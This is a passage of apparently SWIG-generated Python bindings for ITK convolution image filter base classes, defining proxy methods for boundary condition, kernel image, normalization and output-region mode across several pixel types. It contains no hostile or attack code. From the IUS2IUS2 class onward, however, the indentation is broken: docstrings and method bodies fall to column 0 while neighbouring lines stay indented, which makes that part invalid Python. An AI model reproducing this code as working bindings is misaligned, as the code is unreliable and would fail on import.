class itkConvolutionImageFilterBaseIUC2IUC2(itkImageToImageFilterAPython.itkImageToImageFilterIUC2IUC2):
    """Proxy of C++ itkConvolutionImageFilterBaseIUC2IUC2 class.

    SWIG-generated wrapper: every method below forwards to the compiled
    extension module, and each one is re-bound via new_instancemethod in the
    module-level statements that follow this class body.  IUC2 presumably
    denotes Image<unsigned char, 2> (ITK wrapping naming convention — confirm
    against the wrapping configuration).
    """
    # SWIG ownership flag: True when the Python proxy owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    def __init__(self, *args, **kwargs):
        # Direct construction is disabled; create instances with New().
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIUC2') -> "void":
        """SetBoundaryCondition(itkConvolutionImageFilterBaseIUC2IUC2 self, itkImageBoundaryConditionIUC2 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetBoundaryCondition(self, _arg)
    def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIUC2 *":
        """GetBoundaryCondition(itkConvolutionImageFilterBaseIUC2IUC2 self) -> itkImageBoundaryConditionIUC2"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetBoundaryCondition(self)
    def SetKernelImage(self, _arg: 'itkImageUC2') -> "void":
        """SetKernelImage(itkConvolutionImageFilterBaseIUC2IUC2 self, itkImageUC2 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetKernelImage(self, _arg)
    def GetKernelImage(self) -> "itkImageUC2 const *":
        """GetKernelImage(itkConvolutionImageFilterBaseIUC2IUC2 self) -> itkImageUC2"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetKernelImage(self)
    def SetNormalize(self, _arg: 'bool const') -> "void":
        """SetNormalize(itkConvolutionImageFilterBaseIUC2IUC2 self, bool const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetNormalize(self, _arg)
    def GetNormalize(self) -> "bool":
        """GetNormalize(itkConvolutionImageFilterBaseIUC2IUC2 self) -> bool"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetNormalize(self)
    def NormalizeOn(self) -> "void":
        """NormalizeOn(itkConvolutionImageFilterBaseIUC2IUC2 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_NormalizeOn(self)
    def NormalizeOff(self) -> "void":
        """NormalizeOff(itkConvolutionImageFilterBaseIUC2IUC2 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_NormalizeOff(self)
    # OutputRegionModeType enum values accepted by SetOutputRegionMode.
    SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SAME
    VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_VALID
    def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIUC2IUC2::OutputRegionModeType const') -> "void":
        """SetOutputRegionMode(itkConvolutionImageFilterBaseIUC2IUC2 self, itkConvolutionImageFilterBaseIUC2IUC2::OutputRegionModeType const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionMode(self, _arg)
    def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIUC2IUC2::OutputRegionModeType":
        """GetOutputRegionMode(itkConvolutionImageFilterBaseIUC2IUC2 self) -> itkConvolutionImageFilterBaseIUC2IUC2::OutputRegionModeType"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetOutputRegionMode(self)
    def SetOutputRegionModeToSame(self) -> "void":
        """SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIUC2IUC2 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionModeToSame(self)
    def SetOutputRegionModeToValid(self) -> "void":
        """SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIUC2IUC2 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionModeToValid(self)
    # Destructor hook invoked by SWIG when the proxy is deleted.
    __swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIUC2IUC2
    def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUC2IUC2 *":
        """cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUC2IUC2"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_cast(obj)
    cast = staticmethod(cast)
    def New(*args, **kargs):
        """New() -> itkConvolutionImageFilterBaseIUC2IUC2
        Create a new object of the class itkConvolutionImageFilterBaseIUC2IUC2 and set the input and the parameters if some
        named or non-named arguments are passed to that method.
        New() tries to assign all the non named parameters to the input of the new objects - the
        first non named parameter in the first input, etc.
        The named parameters are used by calling the method with the same name prefixed by 'Set'.
        Ex:
          itkConvolutionImageFilterBaseIUC2IUC2.New( reader, Threshold=10 )
        is (most of the time) equivalent to:
          obj = itkConvolutionImageFilterBaseIUC2IUC2.New()
          obj.SetInput( 0, reader.GetOutput() )
          obj.SetThreshold( 10 )
        """
        # __New_orig__ is the factory installed by the wrapping machinery
        # (not defined in this chunk); itkTemplate.New then applies the
        # argument-assignment protocol described in the docstring.
        obj = itkConvolutionImageFilterBaseIUC2IUC2.__New_orig__()
        import itkTemplate
        itkTemplate.New(obj, *args, **kargs)
        return obj
    New = staticmethod(New)
# Module-import-time patching: replace each Python-level proxy method with a
# new_instancemethod wrapper that calls the compiled C function directly,
# then register the proxy class with the SWIG runtime type system.
itkConvolutionImageFilterBaseIUC2IUC2.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetKernelImage, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetKernelImage, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetNormalize, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetNormalize, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_NormalizeOn, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_NormalizeOff, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIUC2IUC2)
itkConvolutionImageFilterBaseIUC2IUC2_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_swigregister
itkConvolutionImageFilterBaseIUC2IUC2_swigregister(itkConvolutionImageFilterBaseIUC2IUC2)
def itkConvolutionImageFilterBaseIUC2IUC2_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUC2IUC2 *":
    """Module-level helper: downcast *obj* (an itkLightObject) to
    itkConvolutionImageFilterBaseIUC2IUC2 via the compiled SWIG wrapper.
    """
    casted = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC2IUC2_cast(obj)
    return casted
class itkConvolutionImageFilterBaseIUC3IUC3(itkImageToImageFilterAPython.itkImageToImageFilterIUC3IUC3):
    """Proxy of C++ itkConvolutionImageFilterBaseIUC3IUC3 class.

    SWIG-generated wrapper: every method below forwards to the compiled
    extension module, and each one is re-bound via new_instancemethod in the
    module-level statements that follow this class body.  IUC3 presumably
    denotes Image<unsigned char, 3> (ITK wrapping naming convention — confirm
    against the wrapping configuration).
    """
    # SWIG ownership flag: True when the Python proxy owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    def __init__(self, *args, **kwargs):
        # Direct construction is disabled; create instances with New().
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIUC3') -> "void":
        """SetBoundaryCondition(itkConvolutionImageFilterBaseIUC3IUC3 self, itkImageBoundaryConditionIUC3 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetBoundaryCondition(self, _arg)
    def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIUC3 *":
        """GetBoundaryCondition(itkConvolutionImageFilterBaseIUC3IUC3 self) -> itkImageBoundaryConditionIUC3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetBoundaryCondition(self)
    def SetKernelImage(self, _arg: 'itkImageUC3') -> "void":
        """SetKernelImage(itkConvolutionImageFilterBaseIUC3IUC3 self, itkImageUC3 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetKernelImage(self, _arg)
    def GetKernelImage(self) -> "itkImageUC3 const *":
        """GetKernelImage(itkConvolutionImageFilterBaseIUC3IUC3 self) -> itkImageUC3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetKernelImage(self)
    def SetNormalize(self, _arg: 'bool const') -> "void":
        """SetNormalize(itkConvolutionImageFilterBaseIUC3IUC3 self, bool const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetNormalize(self, _arg)
    def GetNormalize(self) -> "bool":
        """GetNormalize(itkConvolutionImageFilterBaseIUC3IUC3 self) -> bool"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetNormalize(self)
    def NormalizeOn(self) -> "void":
        """NormalizeOn(itkConvolutionImageFilterBaseIUC3IUC3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_NormalizeOn(self)
    def NormalizeOff(self) -> "void":
        """NormalizeOff(itkConvolutionImageFilterBaseIUC3IUC3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_NormalizeOff(self)
    # OutputRegionModeType enum values accepted by SetOutputRegionMode.
    SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SAME
    VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_VALID
    def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIUC3IUC3::OutputRegionModeType const') -> "void":
        """SetOutputRegionMode(itkConvolutionImageFilterBaseIUC3IUC3 self, itkConvolutionImageFilterBaseIUC3IUC3::OutputRegionModeType const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionMode(self, _arg)
    def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIUC3IUC3::OutputRegionModeType":
        """GetOutputRegionMode(itkConvolutionImageFilterBaseIUC3IUC3 self) -> itkConvolutionImageFilterBaseIUC3IUC3::OutputRegionModeType"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetOutputRegionMode(self)
    def SetOutputRegionModeToSame(self) -> "void":
        """SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIUC3IUC3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionModeToSame(self)
    def SetOutputRegionModeToValid(self) -> "void":
        """SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIUC3IUC3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionModeToValid(self)
    # Destructor hook invoked by SWIG when the proxy is deleted.
    __swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIUC3IUC3
    def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUC3IUC3 *":
        """cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUC3IUC3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_cast(obj)
    cast = staticmethod(cast)
    def New(*args, **kargs):
        """New() -> itkConvolutionImageFilterBaseIUC3IUC3
        Create a new object of the class itkConvolutionImageFilterBaseIUC3IUC3 and set the input and the parameters if some
        named or non-named arguments are passed to that method.
        New() tries to assign all the non named parameters to the input of the new objects - the
        first non named parameter in the first input, etc.
        The named parameters are used by calling the method with the same name prefixed by 'Set'.
        Ex:
          itkConvolutionImageFilterBaseIUC3IUC3.New( reader, Threshold=10 )
        is (most of the time) equivalent to:
          obj = itkConvolutionImageFilterBaseIUC3IUC3.New()
          obj.SetInput( 0, reader.GetOutput() )
          obj.SetThreshold( 10 )
        """
        # __New_orig__ is the factory installed by the wrapping machinery
        # (not defined in this chunk); itkTemplate.New then applies the
        # argument-assignment protocol described in the docstring.
        obj = itkConvolutionImageFilterBaseIUC3IUC3.__New_orig__()
        import itkTemplate
        itkTemplate.New(obj, *args, **kargs)
        return obj
    New = staticmethod(New)
# Module-import-time patching: replace each Python-level proxy method with a
# new_instancemethod wrapper that calls the compiled C function directly,
# then register the proxy class with the SWIG runtime type system.
itkConvolutionImageFilterBaseIUC3IUC3.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetKernelImage, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetKernelImage, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetNormalize, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetNormalize, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_NormalizeOn, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_NormalizeOff, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_swigregister
itkConvolutionImageFilterBaseIUC3IUC3_swigregister(itkConvolutionImageFilterBaseIUC3IUC3)
def itkConvolutionImageFilterBaseIUC3IUC3_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUC3IUC3 *":
    """Module-level helper: downcast *obj* (an itkLightObject) to
    itkConvolutionImageFilterBaseIUC3IUC3 via the compiled SWIG wrapper.
    """
    casted = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_cast(obj)
    return casted
class itkConvolutionImageFilterBaseIUS2IUS2(itkImageToImageFilterAPython.itkImageToImageFilterIUS2IUS2):
"""Proxy of C++ itkConvolutionImageFilterBaseIUS2IUS2 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    def __init__(self, *args, **kwargs):
        # Direct construction is disabled; create instances with New().
        raise AttributeError("No constructor defined")
__repr__ = _swig_repr
    def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIUS2') -> "void":
        """SetBoundaryCondition(itkConvolutionImageFilterBaseIUS2IUS2 self, itkImageBoundaryConditionIUS2 _arg)

        Set the image boundary condition; forwards to the compiled SWIG
        extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetBoundaryCondition(self, _arg)
    def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIUS2 *":
        """GetBoundaryCondition(itkConvolutionImageFilterBaseIUS2IUS2 self) -> itkImageBoundaryConditionIUS2

        Return the current image boundary condition; forwards to the compiled
        SWIG extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetBoundaryCondition(self)
    def SetKernelImage(self, _arg: 'itkImageUS2') -> "void":
        """SetKernelImage(itkConvolutionImageFilterBaseIUS2IUS2 self, itkImageUS2 _arg)

        Set the kernel image; forwards to the compiled SWIG extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetKernelImage(self, _arg)
    def GetKernelImage(self) -> "itkImageUS2 const *":
        """GetKernelImage(itkConvolutionImageFilterBaseIUS2IUS2 self) -> itkImageUS2

        Return the current kernel image (const on the C++ side); forwards to
        the compiled SWIG extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetKernelImage(self)
    def SetNormalize(self, _arg: 'bool const') -> "void":
        """SetNormalize(itkConvolutionImageFilterBaseIUS2IUS2 self, bool const _arg)

        Set the boolean Normalize flag; forwards to the compiled SWIG
        extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetNormalize(self, _arg)
    def GetNormalize(self) -> "bool":
        """GetNormalize(itkConvolutionImageFilterBaseIUS2IUS2 self) -> bool

        Return the boolean Normalize flag; forwards to the compiled SWIG
        extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetNormalize(self)
    def NormalizeOn(self) -> "void":
        """NormalizeOn(itkConvolutionImageFilterBaseIUS2IUS2 self)

        Convenience switch for the Normalize flag (presumably equivalent to
        SetNormalize(True) on the C++ side — confirm in the ITK sources);
        forwards to the compiled SWIG extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_NormalizeOn(self)
    def NormalizeOff(self) -> "void":
        """NormalizeOff(itkConvolutionImageFilterBaseIUS2IUS2 self)

        Convenience switch for the Normalize flag (presumably equivalent to
        SetNormalize(False) on the C++ side — confirm in the ITK sources);
        forwards to the compiled SWIG extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_VALID
    def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIUS2IUS2::OutputRegionModeType const') -> "void":
        """SetOutputRegionMode(itkConvolutionImageFilterBaseIUS2IUS2 self, itkConvolutionImageFilterBaseIUS2IUS2::OutputRegionModeType const _arg)

        Set the output-region mode (one of the class constants SAME/VALID);
        forwards to the compiled SWIG extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIUS2IUS2::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseIUS2IUS2 self) -> itkConvolutionImageFilterBaseIUS2IUS2::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIUS2IUS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIUS2IUS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIUS2IUS2
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUS2IUS2 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUS2IUS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseIUS2IUS2
Create a new object of the class itkConvolutionImageFilterBaseIUS2IUS2 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseIUS2IUS2.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseIUS2IUS2.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseIUS2IUS2.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseIUS2IUS2.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetKernelImage, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetKernelImage, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetNormalize, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetNormalize, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_NormalizeOn, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_NormalizeOff, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_swigregister
itkConvolutionImageFilterBaseIUS2IUS2_swigregister(itkConvolutionImageFilterBaseIUS2IUS2)
def itkConvolutionImageFilterBaseIUS2IUS2_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUS2IUS2 *":
"""itkConvolutionImageFilterBaseIUS2IUS2_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUS2IUS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_cast(obj)
class itkConvolutionImageFilterBaseIUS3IUS3(itkImageToImageFilterAPython.itkImageToImageFilterIUS3IUS3):
"""Proxy of C++ itkConvolutionImageFilterBaseIUS3IUS3 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIUS3') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseIUS3IUS3 self, itkImageBoundaryConditionIUS3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIUS3 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseIUS3IUS3 self) -> itkImageBoundaryConditionIUS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageUS3') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseIUS3IUS3 self, itkImageUS3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageUS3 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseIUS3IUS3 self) -> itkImageUS3"""
